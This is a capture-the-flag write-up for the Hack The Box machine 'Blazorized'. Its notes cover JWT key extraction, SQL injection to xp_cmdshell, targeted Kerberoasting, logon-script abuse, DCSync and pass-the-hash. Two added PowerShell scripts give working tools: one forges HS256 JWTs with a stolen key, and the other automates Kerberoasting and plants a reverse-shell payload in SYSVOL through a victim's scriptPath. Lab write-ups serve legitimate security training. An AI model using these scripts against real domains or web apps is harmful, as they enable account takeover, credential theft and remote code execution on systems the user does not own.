Foothold
1. ffuf (vhost fuzzing on the Host header) to find admin.blazorized.htb
2. Download shared.dll from the site and pull the JWT signing key out of it
3. Sign your own JWT with that key and put it in the browser's local storage for admin.blazorized.htb
4. SQL injection in the admin panel, then xp_cmdshell, to get RCE
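Steps 2 and 3 of the foothold, as an added example (not from the original notes): forge an HS256 JWT with a key recovered from shared.dll and self-check the signature before pasting it into local storage. The key value, the claim names and values (iss, aud, sub, role) and the local-storage key name are placeholders; the real ones have to be read out of the decompiled DLL, because a .NET JwtBearer validator rejects tokens whose issuer, audience or lifetime do not match what the app configured.

```powershell
# Added example: HS256 JWT forging in PowerShell. Key and claims are placeholders.

function ConvertTo-Base64Url {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    # JWT uses base64url without padding
    [Convert]::ToBase64String($Bytes).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

function New-Hs256Jwt {
    param(
        [Parameter(Mandatory)][string]$Key,                                # secret from shared.dll
        [Parameter(Mandatory)][System.Collections.IDictionary]$Claims      # payload claims, ordered
    )
    $enc          = [System.Text.Encoding]::UTF8
    $header       = ConvertTo-Base64Url ($enc.GetBytes('{"alg":"HS256","typ":"JWT"}'))
    $payload      = ConvertTo-Base64Url ($enc.GetBytes((ConvertTo-Json -InputObject $Claims -Compress)))
    $signingInput = "$header.$payload"
    $hmac = [System.Security.Cryptography.HMACSHA256]::new($enc.GetBytes($Key))
    try     { $sig = ConvertTo-Base64Url ($hmac.ComputeHash($enc.GetBytes($signingInput))) }
    finally { $hmac.Dispose() }
    "$signingInput.$sig"
}

function Test-Hs256Jwt {
    # Recompute the signature with the same key; True means the server will accept the signature
    # (claims are still checked separately by the app).
    param([Parameter(Mandatory)][string]$Token, [Parameter(Mandatory)][string]$Key)
    $parts = $Token.Split('.')
    if ($parts.Count -ne 3) { return $false }
    $enc  = [System.Text.Encoding]::UTF8
    $hmac = [System.Security.Cryptography.HMACSHA256]::new($enc.GetBytes($Key))
    try     { $expected = ConvertTo-Base64Url ($hmac.ComputeHash($enc.GetBytes("$($parts[0]).$($parts[1])"))) }
    finally { $hmac.Dispose() }
    $expected -ceq $parts[2]
}

# --- usage ---
$key = 'PLACEHOLDER_KEY_FROM_SHARED_DLL'       # assumption: replace with the real key
$now = [DateTimeOffset]::UtcNow
$claims = [ordered]@{
    iss  = 'placeholder-issuer'                 # must equal the issuer the DLL validates
    aud  = 'placeholder-audience'               # must equal the audience the DLL validates
    sub  = 'placeholder-user'
    role = 'placeholder-admin-role'             # role claim name and value as used by the DLL
    nbf  = $now.ToUnixTimeSeconds()
    exp  = $now.AddHours(8).ToUnixTimeSeconds()
}
$jwt = New-Hs256Jwt -Key $key -Claims $claims
if (-not (Test-Hs256Jwt -Token $jwt -Key $key)) { throw 'self-check failed: token does not verify' }
$jwt
# In the browser console on admin.blazorized.htb (storage key name is an assumption):
#   localStorage.setItem('jwt', '<paste token>')
```

If the app still answers 401 after the self-check passes, the claims rather than the signature are the problem: compare iss, aud, the role claim name and the expiry handling against the token-validation parameters in the decompiled DLL.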
PrivEsc
1. DACL attack 1: nu_1055 can write an SPN onto RSA_4810 (targeted Kerberoast)
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "nu_1055"}
2. Add an SPN, request a ticket for it and roast it to recover RSA_4810's password, then evil-winrm as RSA_4810
Set-DomainObject -Identity RSA_4810 -Set @{serviceprincipalname='test/tester'}
Get-DomainSPNTicket -SPN test/tester
3. DACL attack 2: RSA_4810 can modify the logon script path (scriptPath) of SSA_6010
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}
4. Upload rev.ps1 to the SYSVOL scripts folder RSA_4810 can write to:
C:\Windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23
5. Set script path for SSA_6010
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\rev.ps1'
6. Once SSA_6010 logs on and the script runs, get a meterpreter shell, load mimikatz and DCSync to get the Administrator hash
7. Pass the hash as Administrator to get root.txt
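Steps 1 to 5 of the PrivEsc as one PowerView script, added here as an example rather than taken from the original notes. It adds what the one-liners leave out: a check that the SPN write actually landed, hashcat-ready output, removal of the temporary SPN afterwards, and a read-back of scriptPath. It assumes PowerView is loaded in each session, that the notes' account names and folder name are used, and that $PayloadPath points at your reverse-shell script (an assumption). The first half runs as nu_1055, the second as RSA_4810 after the cracked password is in hand.

```powershell
# Added example: targeted Kerberoast + logon-script abuse with PowerView, with cleanup.

$RoastTarget  = 'RSA_4810'
$ScriptTarget = 'SSA_6010'
$TempSpn      = 'test/tester'
$ScriptsDir   = 'C:\Windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23'
$PayloadPath  = 'C:\Users\Public\rev.ps1'     # assumption: local path of your reverse shell

# Enumerate abusable ACEs held by a principal (the Find-InterestingDomainAcl step).
function Get-AbusableAces([string]$Principal) {
    Find-InterestingDomainAcl -ResolveGUIDs |
        Where-Object { $_.IdentityReferenceName -match $Principal } |
        Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName
}

# Targeted Kerberoast: write an SPN, confirm it took, pull the TGS hash, then clear the SPN
# so the account is left as found.
function Invoke-TargetedKerberoast([string]$User, [string]$Spn) {
    Set-DomainObject -Identity $User -Set @{serviceprincipalname = $Spn}
    try {
        $spnNow = (Get-DomainUser -Identity $User -Properties serviceprincipalname).serviceprincipalname
        if ($spnNow -notcontains $Spn) { throw "SPN write on $User did not take effect; check the ACE" }
        # Hashcat format: $krb5tgs$23$... line for hashcat -m 13100
        Get-DomainSPNTicket -SPN $Spn -OutputFormat Hashcat | Select-Object -ExpandProperty Hash
    }
    finally {
        Set-DomainObject -Identity $User -Clear serviceprincipalname
    }
}

# Logon-script abuse: drop the payload in the writable scripts folder, point the victim's
# scriptPath at it (relative to the scripts root), and read the attribute back.
function Set-LogonScriptPayload([string]$User, [string]$Dir, [string]$Payload) {
    if (-not (Test-Path $Dir)) { throw "Scripts folder $Dir not found or not readable" }
    Copy-Item -Path $Payload -Destination (Join-Path $Dir 'rev.ps1') -Force
    $relative = (Split-Path $Dir -Leaf) + '\rev.ps1'        # e.g. A32FF3AEAA23\rev.ps1
    Set-DomainObject -Identity $User -Set @{scriptpath = $relative}
    (Get-DomainUser -Identity $User -Properties scriptpath).scriptpath
}

# --- session 1: as nu_1055 ---
Get-AbusableAces 'nu_1055'
Invoke-TargetedKerberoast -User $RoastTarget -Spn $TempSpn | Out-File -Encoding ascii rsa_4810.hash
# crack offline: hashcat -m 13100 rsa_4810.hash <wordlist>, then evil-winrm as RSA_4810

# --- session 2: as RSA_4810 ---
Get-AbusableAces 'RSA_4810'
Set-LogonScriptPayload -User $ScriptTarget -Dir $ScriptsDir -Payload $PayloadPath
```

The script only runs when SSA_6010 actually logs on, so have the listener up before setting scriptPath and expect a wait. Set-DomainObject is used in place of Set-ADUser from the notes so the whole thing needs only PowerView; the attribute written is the same.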